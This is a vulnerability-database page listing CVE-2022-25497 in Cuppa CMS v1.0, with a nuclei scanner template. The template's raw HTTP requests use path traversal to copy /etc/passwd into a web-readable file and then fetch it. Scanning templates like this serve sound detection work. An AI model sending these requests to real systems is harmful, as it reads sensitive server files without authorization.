Lucene search
K

Cuppa CMS v1.0 - Local File Inclusion

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Cuppa CMS v1.0 - File Inclusion, Unauthorized Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-25497
15 Mar 202218:15
attackerkb
Circl
CVE-2022-25497
15 Mar 202221:19
circl
CNNVD
CuppaCMS 安全漏洞
15 Mar 202200:00
cnnvd
CNVD
CuppaCMS has an unspecified vulnerability
16 Mar 202200:00
cnvd
CVE
CVE-2022-25497
15 Mar 202217:31
cve
Cvelist
CVE-2022-25497
15 Mar 202217:31
cvelist
NVD
CVE-2022-25497
15 Mar 202218:15
nvd
OSV
CVE-2022-25497
15 Mar 202218:15
osv
Prion
Code injection
15 Mar 202218:15
prion
RedhatCVE
CVE-2022-25497
23 May 202500:06
redhatcve
Rows per page
id: CVE-2022-25497

info:
  name: Cuppa CMS v1.0 - Local File Inclusion
  author: theamanrawat
  severity: medium
  description: |
    CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25497
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-25497
    cwe-id: CWE-552
    epss-score: 0.03642
    epss-percentile: 0.88219
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cuppacms
    product: cuppacms
  tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms,vuln

http:
  - raw:
      - |
        POST /js/filemanager/api/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../{{randstr}}.txt","action":"copyFile"}
      - |
        GET /{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - text/plain

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402202ed810ba2f11cd12af2dacc57fcd19844e44619c6d33acd3af331ab34263a36e0220300968c3ae2ddd920483747022c9b226ff35c96544bdcd2a067ff2ed37c94c97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.03642
25